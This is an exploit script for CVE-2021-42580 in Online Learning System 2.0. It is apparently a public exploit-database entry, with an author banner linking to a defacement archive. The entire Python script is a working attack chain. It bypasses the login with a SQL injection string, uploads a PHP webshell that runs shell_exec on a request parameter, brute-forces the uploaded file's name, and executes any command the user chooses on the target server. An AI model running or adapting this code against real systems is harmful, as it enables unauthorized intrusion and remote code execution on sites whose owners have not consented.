# Exploit Title: Online Learning System 2.0 - Remote Code Execution (RCE) # Date: 15/11/2021 # Exploit Author: djebbaranon # Vendor Homepage: https://github.com/oretnom23 # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/elearning_v2_0.zip # Version: 2.0 # Tested on: Kali linux / Windows 10 # CVE : CVE-2021-42580 #!/usr/bin/python3 import os import time import argparse import requests import sys from colorama import init from colorama import Fore from colorama import Back from colorama import Style init(autoreset=True) def banner(): print(''' _____ _ _ _ _ _____ ______ _____ _____ | _ | | (_) | | (_) / __ \ | ___ / __ | ___| | | | |_ __ | |_ _ __ ___ | | ___ __ _ _ __ _ __ _ _ __ __ _ __ _`' / /' | |_/ | / \| |__ | | | | '_ \| | | '_ \ / _ \ | |/ _ \/ _` | '__| '_ \| | '_ \ / _` | \ \ / / / / | /| | | __| \ \_/ | | | | | | | | | __/ | | __| (_| | | | | | | | | | | (_| | \ V /./ /___ | |\ \| \__/| |___ \___/|_| |_|_|_|_| |_|\___| |_|\___|\__,_|_| |_| |_|_|_| |_|\__, | \_/ \_____/ \_| \_|\____\____/ __/ | |___/ Written by djebbaranon twitter : @dj3bb4ran0n1 zone-h : http://zone-h.org/archive/notifier=djebbaranon ''') banner() def my_args(): parser = argparse.ArgumentParser(epilog="Example : python3 -u http://localhost/elearning -r 1000 -c whoami") parser.add_argument("-u","--url",type=str,required=True,help="url of target") parser.add_argument("-r","--range",type=int,required=True,help="range for bruteforce the webshell name") parser.add_argument("-c","--command",type=str,required=True,help="command to execute") my_arguments = parser.parse_args() return my_arguments def login_with_sqli_login_bypass(user,passw): global session global url global cookies url = my_args().url session = requests.Session() data = { "username" : user, "password" : passw, } try: response = session.post(url + "/classes/Login.php?f=login",data=data,verify=False) print( Fore.GREEN + "[+] Logged in succsusfully") cookies = response.cookies.get_dict() print("[+] your cookie : ") except requests.HTTPError as exception: print(Fore.RED + "[-] HTTP Error : {}".format(exception)) sys.exit(1) login_with_sqli_login_bypass("' or 1=1 -- -","' or 1=1 -- -") def main(shell_name,renamed_shell): try: payload ={ "id" : "", "faculty_id" : "test", "firstname" : "test", "lastname" : "test", "middlename" : "fsdfsd", "dob" : "2021-10-29", "gender": "Male", "department_id" : "1", "email" : "zebi@gmail.com", "contact" : "zebii", "address" : "zebii", } files = { "img" : ( shell_name, "

nikmok

\" . shell_exec($_REQUEST['cmd']) . \"\"?>", "application/octet-stream", ) } vunlerable_file = "/classes/Master.php?f=save_faculty" print("[*] Trying to upload webshell ....") response_2 = session.post(url + vunlerable_file,data=payload,cookies=cookies,files=files) print("[+] trying to bruteforce the webshell ....") rangee = my_args().range for i in range(0,rangee): try: with requests.get(url + "/uploads/Favatar_" + str(i) + ".php?cmd=whoami",allow_redirects=False) as response3: if "nikmok" in response3.text and response3.status_code == 200: print("\n" + Fore.GREEN + "[+] shell found : " + response3.url +"\n") break with open("shell.txt",mode="w+") as writer: writer.write(response3.url) else: print( Fore.RED + "[-] shell not found : " + response3.url) except requests.HTTPError as exception2: print("[-] HTTP Error : {0} ".format(exception2)) except requests.HTTPError as error: print("[-] HTTP Error : ".format(error)) command = my_args().command with requests.get(response3.url.replace("whoami",command)) as response4: print("[*] Executing {} ....".format(command)) time.sleep(3) print("\n" + Style.BRIGHT + Fore.GREEN + response4.text) main("hackerman.php","")